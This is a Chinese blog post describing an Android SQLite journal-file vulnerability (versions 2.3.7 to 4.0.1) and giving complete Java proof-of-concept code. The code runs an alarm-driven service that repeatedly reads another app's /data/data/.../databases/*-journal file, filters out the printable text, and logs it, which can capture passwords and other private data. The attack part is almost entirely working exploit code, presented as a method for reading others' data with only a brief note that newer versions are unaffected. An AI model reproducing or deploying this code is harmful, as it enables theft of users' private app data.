Android Sqlite 漏洞

最新推荐文章于 2022-10-06 14:40:43 发布
最新推荐文章于 2022-10-06 14:40:43 发布
阅读量653 收藏
点赞数
分类专栏: journal文件 android漏洞,sqlite

   Android 版本在2.3.7和4.0.1之间有个sqlite漏洞,这个漏洞会导致任何第三方应用可以访问/data/data/<packagename>/databases/<your db>-journal文件,这样就能读取你的私密数据,特别里面如果有密码什么的,读取方法如下:


public class SqliteJournalLeakActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_sqlite_journal_leak);
        final Intent intent = new Intent(this,SqliteJournalLeakService.class);
        final PendingIntent pending = PendingIntent.getService(this,0,intent,0);
        final AlarmManager alarm = (AlarmManager)this.getSystemService(Context.ALARM_SERVICE);
        alarm.cancel(pending);
        long interval = 30;
        alarm.setRepeating(AlarmManager.ELAPSED_REALTIME, SystemClock.elapsedRealtime(),interval,pending);


    }
}

 
package com.ibm.android.sqlitejournal;

import android.app.Service;
import android.content.Intent;
import android.os.Binder;
import android.os.IBinder;

import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.FileReader;
import java.util.HashMap;

public class SqliteJournalLeakService extends Service {

    private final String[] Databases = {"/com.test/databases/scanresult.db"};
    private final IBinder mBinder = new SqliteJournalLeakServiceBinder();
    private HashMap<String, Long> mLastChanges = new HashMap<String, Long>();
    private FileOutputStream mLog;

    @Override
    public void onCreate() {
        super.onCreate();
        try {
            mLog = openFileOutput("leak.log", MODE_PRIVATE);
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        }
    }

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        trackChanges();
        return super.onStartCommand(intent, flags, startId);
    }

    private void trackChanges() {
        for(String name:Databases){
            name = "/data/data"+name+"-journal";
            File f = new File(name);
            if(!f.exists()){
                continue;
            }

            if(!mLastChanges.containsKey(name)){
                mLastChanges.put(name,f.lastModified());
                handleChange(f);
            }

            long m = f.lastModified();
            if(mLastChanges.get(name)>= m)
                continue;
            mLastChanges.put(name,m);
            handleChange(f);
        }
    }

    private void handleChange(File f) {
        log(f.getAbsolutePath(),getPrintable(f));
    }

    private String getPrintable(File journal) {
        String printable = "";
        int len = 0;
        FileReader fr;
        try{
            fr = new FileReader(journal);
            char[] buffer = new char[1024];
            while((len=fr.read(buffer))!=-1){
                for(int i=0;i<len;i++){
                    if(filter(buffer[i]))
                        printable+=buffer[i];
                }
            }
        }catch (Exception e){
            e.printStackTrace();
        }
        return printable;
    }

    private boolean filter(char c) {
        switch (c){
            case '\n':
            case '\r':
            case '\t':
                return true;
        }
        if((c>=0x20)&&(c<=0x80)){
            return true;
        }
        return false;
    }

    private void log(String pkg,String data){
        String line = pkg+":\n\n"+data+"\n===============================";
        try{
            mLog.write(line.getBytes());
            mLog.flush();
        }catch (Exception e){
            e.printStackTrace();
        }
    }

    @Override
    public IBinder onBind(Intent intent) {
        return mBinder;
    }



    public class SqliteJournalLeakServiceBinder extends Binder {
        SqliteJournalLeakService getService() {

            return SqliteJournalLeakService.this;
        }
    }
}


不过只要你的系统版本在4.0.1以上就不会有这个问题了

梦翼-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
android 漏洞库,android系统sqlite数据库注入漏洞
weixin_42116734的博客
05-27 356
漏洞概要缺陷编号:WooYun-2012-04550漏洞标题:android系统sqlite数据库注入漏洞相关厂商:android漏洞作者:冷森提交时间:2012-02-15 18:44公开时间:2012-02-15 18:44漏洞类型:设计错误/逻辑缺陷危害等级:自评Rank:5漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2012-02-15: 积极联系厂商并且等待厂...
SQLite漏洞!所有Chromium浏览器招,安卓iOS应用也受殃及
量子位
12-17 477
发自 凹非寺 量子位 报道 | 公众号 QbitAI一个SQLite大bug,影响之大、范围之广,不容小觑。今天,腾讯Blade安全团队发现的SQLite漏洞披露,...
腾讯安全团队披露SQLite数据库漏洞,数千款日常必备软件或受影响
mozhe_的博客
12-18 461
据报道,由腾讯刀锋安全团队发现的一个新的SQLite数据库漏洞可能会影响到数千款常用的桌面和移动应用程序,包括谷歌Chromium浏览器。具体而言,该漏洞允许攻击者在受害者的计算机上运行恶意代码,并可能会导致内存泄露或应用程序崩溃。 SQLite是一种轻量级数据库,支持Windows、Linux和Unix等主流操作系统,且能够与多种编程语言(如 Tcl、C#、PHP和Java等)结合使用。相比主...
SQLite 被曝存在漏洞,数千应用受影响
CSDN资讯
12-17 1558
SQLite 被曝存在一个影响数千应用的漏洞,受害应用包括所有基于 Chromium 的浏览器。据 ZDNet 报导,该漏洞由腾讯 Blade 安全团队发现,允许攻击者在...
SQL手工注入漏洞测试(SQLite数据库)
weixin_47493074的博客
10-06 697
SQL手工注入漏洞测试(SQLite数据库)
sqlite3.45.1版本
最新发布
03-11
在实际开发SQLite3常用于移动应用(如Android和iOS)的本地数据存储,因为它不需要额外的服务器进程,占用资源少,且易于集成。对于小型应用或作为临时数据存储解决方案,SQLite3是一个理想的选择。而通过持续...
sqlcipher-for-android-v3.5.6
05-05
《SQLCipher for Android v3.5.6:安全存储与加密SQLite数据库的解决方案》 在移动设备开发领域,尤其是在Android平台上,SQLite作为轻量级的数据库管理系统,被广泛用于存储和管理应用程序的数据。然而,随着数据...
Sqlcipher 加密sqlite androidstudio as
11-16
Sqlcipher是一种开源的数据库加密解决方案,它为SQLite数据库提供了强大的加密功能,确保在Android Studio (AS) 开发环境存储的数据安全。在Android应用开发SQLite通常被用来管理应用程序的本地数据,但如果不...
Android-SQLite-Parameter-Helper
05-04
Android应用开发SQLite是一个重要的本地数据存储解决方案。SQLite是一个轻量级的数据库系统,它嵌入到Android设备,允许开发者以结构化方式管理应用程序的数据。在使用SQLite进行数据库操作时,确保数据安全...
android-ndk
10-19
2. **库和API头文件**:NDK提供了各种预编译的库,如Android运行时库(Android Runtime)、OpenSSL、SQLite等,以及对应的头文件,方便开发者进行接口调用。 3. **构建系统**:如Android.mk和CMakeLists.txt,它们...
肖梓航:Android安全漏洞及其攻击方法
05-29
基于Android的安全漏洞越来越多,出现安全问题的企业名单越拉越长.为此,肖梓航归总出Android应用漏洞10种威胁,并进行举例分析。这十大威胁是:外部存储;内部存储;传输问题导致数据泄露和会话劫持;数据验证问题导致客户端注入;代码验证问题导致代码执行;登陆认证问题导致非法访问;(Android所独有的)组件暴露导致能力泄露;旁路数据泄露;密码学算法使用不当等。
Android进阶】浅析Android Binder机制
热门推荐
大圣代的技术专栏
03-03 1万+
APP内存的使用,是评价一款应用性能高低的一个重要指标。虽然现在智能手机的内存越来越大,但是一个好的应用应该将效率发挥到极致,精益求精。本文是【Android 性能优化】系列的第二篇文章,我们在第一篇【Android 性能优化】—— UI篇主要介绍了Android界面的优化的原理以及方法,这一篇我们将着重介绍Android的内存优化。本文的篇幅很长,但是请不要嫌烦
数百万APP安全出问题 SQLite数据库出现巨大漏洞
weixin_34234721的博客
12-18 640
研究人员发现,广泛为App、Chromium浏览器或IoT装置使用的SQLite数据库,存在一项重大漏洞,可能让黑客远程执行程序代码。Google及SQLite官方已紧急修补漏洞。 文章转自:SBF胜博发 首先发现这只漏洞的腾讯旗下Blade安全研究部门将之命名为Magellan(麦哲伦)。基于SQLite应用范围之广泛,并未透露漏洞的技术细节,但表示该漏洞可以诱使用户以浏览器造访特定网页而远程...
android SQLite:没有这样的ACOS函数存在
songzi1228的博客
12-04 280
目录 0、相关文章: 1、正文 2、原因: 3、解决方案: 0、相关文章: http://www.it1352.com/161373.html 1、正文 问题描述:通过一下sql语句,希望根据当前的经纬度查询方圆五公里内的需要打点的所有坐标点的经纬度 String sql = "SELECT * , (6371 * ACOS ( cos ( radians ( " + lati...
Android解决数据库注入漏洞风险
lintax的专栏
04-06 8014
在app功能开发完成,提交应用市场时,竟然报高风险,有数据库注入漏洞!什么是数据库注入漏洞,又是怎么检测出来的,要怎样防止呢?SQL注入漏洞检测方式说明:主要就是检测,是否在query()使用拼接字符串组成SQL语句的形式去查询数据库,此时容易发生SQL注入攻击。举一个例子:有一个输入用户名的EditText,我们在查询数据库的时候使用到了它,是这么使用的:String sql = "SELEC...
android开发实战!请谈下Android消息机制,已拿到offer
CHAMPION8888的博客
02-06 246
背景 前段时间朋友辞去了北京一家小创公司Android开发的工作,准备寻找新的工作的时候,要和我聊聊天。告诉我再找不到工作就考虑转行了! 话语间无不感叹安卓有点强弩之末的味道!聊天过程,朋友也顺带分享了一波阿里饿了么、百度Android岗的面经。我也帮他内推了几份工作岗位,却因为技术欠缺和经验不足等问题被友好的回绝了! 面经分享 我是那边的朋友帮忙内推的,简历通过后电话约的面试。 当时约的是 10:30 的面试时间,我提前了二十机分钟左右到达公司楼下。公司楼层有点复杂,花了十分钟左右到目的地(约的食堂)
Android数据存储之SQLite数据库存储数据
记录和分享程序人生的点点滴滴
06-17 1350
Android通过SQLite提供对本地关系数据库的支持。 一. SQLite有如下特点: 1、SQLite3支持 NULL、INTEGER、REAL(浮点数字)、TEXT(字符串文本)和BLOB(二进制对象)数据类型,虽然它支持的类型虽然只有五种,但实际上sqlite3也接受varchar(n)、char(n)、decimal(p,s) 等数据类型,只不过在运算或保存时会转成对应的五种数据
数据库期末复习
while_you的博客
01-12 4438
一、数据库系统概论 DB:数据库 DBMS:数据库管理系统(数据库系统核心,管理和控制数据) DBS:数据库系统 人工管理阶段 文件系统管理阶段:程序与数据有了一定独立性 数据库系统管理阶段 4. 数据库系统特点: 数据结构化、共享高、冗余低、易扩充、数据独立性高 二、数据库系统结构 数据模型:概念模型(如E-R模型)、逻辑模型(如层次、网状、关系模型)、物理模型 数据库系统的三级模式:外模式、概念模式、内模式。 外模式:即用户模式,局部数据。一个数据库可有多个外模式。 概念模式:所有用户的公共
Android静态安全检查(十二):内部SQLite存储风险
不忘初心的专栏
07-08 993
内部SQLite存储风险简介内部SQLite指/data/data/包名/databases/路径下的文件,openOrCreateDatabase方法可以对该路径下的数据进行读写操作。 /** * Open a new private SQLiteDatabase associated with this Context's * application package....
Android安全审计与漏洞修复深度解析:策略与工具应用
本文主要探讨了Android软件安全审计与漏洞修复的相关经验和策略。作者宋申雷来自360信息安全部,他首先介绍了Android的安全机制,强调了其与Linux系统在权限管理上的相似性。在Android,安全起始于基础的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值